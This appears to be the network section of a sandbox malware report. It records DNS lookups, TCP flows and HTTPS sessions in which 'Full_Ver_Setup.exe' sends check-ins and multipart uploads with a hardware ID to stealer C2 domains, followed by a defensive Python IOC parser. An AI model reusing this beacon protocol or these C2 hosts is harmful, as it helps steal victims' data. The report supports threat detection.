Dec 22, 2024 23:30:45.969371080 CET | 443 | 49745 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:45.969481945 CET | 49745 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:45.973264933 CET | 49745 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:45.973308086 CET | 443 | 49745 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:45.976790905 CET | 49746 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:45.976883888 CET | 443 | 49746 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:45.976982117 CET | 49746 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:45.978233099 CET | 49746 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:45.978269100 CET | 443 | 49746 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:50.774959087 CET | 443 | 49746 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:50.775043964 CET | 49746 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.775125980 CET | 49746 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.775167942 CET | 443 | 49746 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:50.775563955 CET | 49747 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.775652885 CET | 443 | 49747 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:50.775749922 CET | 49747 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.776557922 CET | 49747 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.776602030 CET | 443 | 49747 | 194.58.112.174 | 192.168.2.4
Dec 22, 2024 23:30:50.776649952 CET | 49747 | 443 | 192.168.2.4 | 194.58.112.174
Dec 22, 2024 23:30:50.917865992 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:50.917943001 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:50.918041945 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:50.918435097 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:50.918464899 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.133521080 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.133737087 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.135257006 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.135289907 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.135546923 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.136624098 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.179328918 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566571951 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566606998 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566632986 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566653013 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566668034 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.566720009 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566742897 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.566751957 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.566792011 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.566937923 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.566992044 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Dec 22, 2024 23:30:52.567024946 CET | 49748 | 443 | 192.168.2.4 | 104.21.84.113
Dec 22, 2024 23:30:52.567040920 CET | 443 | 49748 | 104.21.84.113 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 23:30:18.151690006 CET | 54297 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 23:30:18.509686947 CET | 53 | 54297 | 1.1.1.1 | 192.168.2.4
Dec 22, 2024 23:30:41.014811039 CET | 49809 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 23:30:41.153346062 CET | 53 | 49809 | 1.1.1.1 | 192.168.2.4
Dec 22, 2024 23:30:50.779095888 CET | 49195 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 23:30:50.916626930 CET | 53 | 49195 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2024 23:30:18.151690006 CET | 192.168.2.4 | 1.1.1.1 | 0x3b6a | Standard query (0) | fannleadyn.click | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:41.014811039 CET | 192.168.2.4 | 1.1.1.1 | 0x7d77 | Standard query (0) | neqi.shop | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:50.779095888 CET | 192.168.2.4 | 1.1.1.1 | 0x4028 | Standard query (0) | kliptizq.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2024 23:30:18.509686947 CET | 1.1.1.1 | 192.168.2.4 | 0x3b6a | No error (0) | fannleadyn.click | | 104.21.63.229 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:18.509686947 CET | 1.1.1.1 | 192.168.2.4 | 0x3b6a | No error (0) | fannleadyn.click | | 172.67.172.94 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:41.153346062 CET | 1.1.1.1 | 192.168.2.4 | 0x7d77 | No error (0) | neqi.shop | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:50.916626930 CET | 1.1.1.1 | 192.168.2.4 | 0x4028 | No error (0) | kliptizq.shop | | 104.21.84.113 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:30:50.916626930 CET | 1.1.1.1 | 192.168.2.4 | 0x4028 | No error (0) | kliptizq.shop | | 172.67.191.144 | A (IP address) | IN (0x0001) | false
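The DNS answer and TCP packet tables above, together with the POST /api check-in recorded in the HTTPS session data further down this page, can be pivoted into indicators mechanically. The Python below is an added example, not Joe Sandbox output and not code from the sample: the record lists are constructed by copying this report's tables, and the helper names (build_iocs, parse_http_request, is_lumma_checkin) and the beacon-matching rule are this example's own.

```python
"""Added example: pivot this report's DNS and flow evidence into IOCs and match
the C2 check-in shape it recorded.  All records are constructed copies of the
report's tables; nothing is fetched from the network."""
from collections import defaultdict
from urllib.parse import parse_qs

SANDBOX_HOST = "192.168.2.4"  # the analysis VM in this report

# Constructed from the "DNS answers" table: (queried name, returned A record)
DNS_ANSWERS = [
    ("fannleadyn.click", "104.21.63.229"),
    ("fannleadyn.click", "172.67.172.94"),
    ("neqi.shop", "194.58.112.174"),
    ("kliptizq.shop", "104.21.84.113"),
    ("kliptizq.shop", "172.67.191.144"),
]

# Constructed from the TCP packet table: the client-side packet that opened
# each connection, as (src_port, dst_port, src_ip, dst_ip)
TCP_PACKETS = [
    (49742, 443, "192.168.2.4", "104.21.63.229"),
    (49743, 443, "192.168.2.4", "104.21.63.229"),
    (49744, 443, "192.168.2.4", "104.21.63.229"),
    (49745, 443, "192.168.2.4", "194.58.112.174"),
    (49746, 443, "192.168.2.4", "194.58.112.174"),
    (49747, 443, "192.168.2.4", "194.58.112.174"),
    (49748, 443, "192.168.2.4", "104.21.84.113"),
]

# Constructed copy of the first request in the HTTPS session data on this page
CHECKIN_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: fannleadyn.click\r\n"
    b"\r\n"
    b"act=life"
)


def build_iocs(answers, packets, client=SANDBOX_HOST):
    """Per domain: which resolved addresses the client actually connected to
    (and on which ports), and which it merely resolved.  Lists are sorted."""
    resolved = defaultdict(set)
    for name, addr in answers:
        resolved[name].add(addr)
    contacted = defaultdict(set)  # dst ip -> dst ports opened by the client
    for _sport, dport, sip, dip in packets:
        if sip == client:
            contacted[dip].add(dport)
    return {
        name: {
            "contacted": sorted(a for a in addrs if a in contacted),
            "resolved_only": sorted(a for a in addrs if a not in contacted),
            "ports": sorted({p for a in addrs for p in contacted.get(a, ())}),
        }
        for name, addrs in resolved.items()
    }


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; a request without a body yields b""."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def is_lumma_checkin(raw: bytes) -> bool:
    """True when a request has the beacon shape recorded on this page: a POST
    to a bare /api carrying the urlencoded form field act=life, with a
    Content-Length that matches the body so a truncated capture or an
    unrelated /api endpoint with a different body does not match."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path != "/api":
        return False
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return False
    if headers.get("content-length") != str(len(body)):
        return False
    return parse_qs(body.decode("latin-1")).get("act") == ["life"]


if __name__ == "__main__":
    for name, info in build_iocs(DNS_ANSWERS, TCP_PACKETS).items():
        print(f"{name}: contacted={info['contacted']} resolved_only={info['resolved_only']}")
    print("check-in matched:", is_lumma_checkin(CHECKIN_REQUEST))
```

Two of the three domains resolve to two addresses each and the sample connected to only one of them; the second address never appears in the packet table, which is what you expect from names behind a shared front-end. The domain, not the address, is therefore the durable indicator, and the check-in matcher keys on request shape (POST /api with act=life) rather than on either. neqi.shop is absent from the HTTPS proxied host list below, so for that server only the DNS and flow rows (client ports 49745 to 49747) are available as evidence.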
• fannleadyn.click
• kliptizq.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:19 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: fannleadyn.click
2024-12-22 22:30:19 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-22 22:30:20 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=370c5l614c03cfend9p85surk4; expires=Thu, 17 Apr 2025 16:16:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXUzKF1Q%2F8WsB5NPgXLa%2FFCwCBg5cRwPenK%2BhHmy%2FlVUbmphb3pZjptooqyjrcR8KlCMp6Ypjt50vSAnW0lNw0aZxxb7zWmGWh%2FxrAAKw19u4S34Z1lf3cLO0ysKvNpxYOF8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e471a127ca6-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1939&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1479229&cwnd=236&unsent_bytes=0&cid=acf1da5d0741ef52&ts=751&x=0"
2024-12-22 22:30:20 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-22 22:30:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:21 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 78
                                                                                                                                                                Host: fannleadyn.click
2024-12-22 22:30:21 UTC | 78 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
2024-12-22 22:30:22 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=nh61823568akutnos2jdan783o; expires=Thu, 17 Apr 2025 16:17:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVdJ6dk%2Bh4ZunlYBJnGw8w4mL4XsQ7onRcjRC1Ie%2BhPaDV2XuZscetzqTF2Opo9yGE29IpYMTQYXHVQezHc%2BNHuLm85lyvjs6PxRk%2FYwbcpCESnUgmS%2FXvatMGzjdfDcChlc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e5369fb4405-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1574&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=978&delivery_rate=1782661&cwnd=221&unsent_bytes=0&cid=94c5f51018949e61&ts=791&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:24 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=JOXNEUD6
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 18102
                                                                                                                                                                Host: fannleadyn.click
2024-12-22 22:30:24 UTC | 15331 | OUT | Data Raw: 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 4a 4f 58 4e 45 55 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
Data Ascii (multipart form body; CRLF line breaks restored from the raw bytes above, dump truncated at the same point as the raw data):
--JOXNEUD6
Content-Disposition: form-data; name="hwid"

74D8278A7EC1EF22E9E2F0D64B3B48BA
--JOXNEUD6
Content-Disposition: form-data; name="pid"

2
--JOXNEUD6
Content-Disposition: form-data; name="lid"

hRjzG3--ZINA
--JOXNEUD6
Content-Dispositi
2024-12-22 22:30:25 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=3ih47jt85sj15996e3osn3map1; expires=Thu, 17 Apr 2025 16:17:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaoYVauyQZXChvsJJIx35iBnpWsBp2mdQVkPJFD1DvJeAkOD3VIDGtH4hNZl50j2F68lQzNZB%2BQxtrzKIk7GogdlX7h6uydyJsD%2FuIx4b5T1GwNKis70hIeYMt3pTcVzJnrL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e639c7e42ad-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=15&recv=23&lost=0&retrans=1&sent_bytes=4220&recv_bytes=19054&delivery_rate=108168&cwnd=242&unsent_bytes=0&cid=bb2afdb7ff9a9984&ts=1251&x=0"
2024-12-22 22:30:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:30:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:26 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=YS0G6TE8A
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8729
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:26 UTC8729OUTData Raw: 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 59 53 30 47 36 54 45 38 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                Data Ascii: --YS0G6TE8AContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--YS0G6TE8AContent-Disposition: form-data; name="pid"2--YS0G6TE8AContent-Disposition: form-data; name="lid"hRjzG3--ZINA--YS0G6TE8AContent-Dispo
2024-12-22 22:30:27 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=dogn9jjtv3jg6ac4cfb9on7as3; expires=Thu, 17 Apr 2025 16:17:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdu2uxx4yifN5Z3G4GsON3T1CMAWKPaPGkQTbXNZqndLg4qyo2004b3uMSBWJuwKEhtDqhQHLzphuzN2KC8rf6pNDp2hYwuQzAnb%2F4sm6axTQc9tm9Q8V%2FhnVtuL4Ddx5B93"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e72282f426a-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1684&rtt_var=643&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9659&delivery_rate=1686886&cwnd=225&unsent_bytes=0&cid=13d0f5aba1c54603&ts=806&x=0"
2024-12-22 22:30:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-22 22:30:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 104.21.63.229 | 443 | 6476 | C:\Users\user\Desktop\Full_Ver_Setup.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:30:28 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=XKLNRRWZBA
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 20388
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:28 UTC15331OUTData Raw: 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                Data Ascii: --XKLNRRWZBAContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--XKLNRRWZBAContent-Disposition: form-data; name="pid"3--XKLNRRWZBAContent-Disposition: form-data; name="lid"hRjzG3--ZINA--XKLNRRWZBAContent-D
                                                                                                                                                                2024-12-22 22:30:28 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
2024-12-22 22:30:29 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=mrnphl0pcu9f8k193c63bj4jn3; expires=Thu, 17 Apr 2025 16:17:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
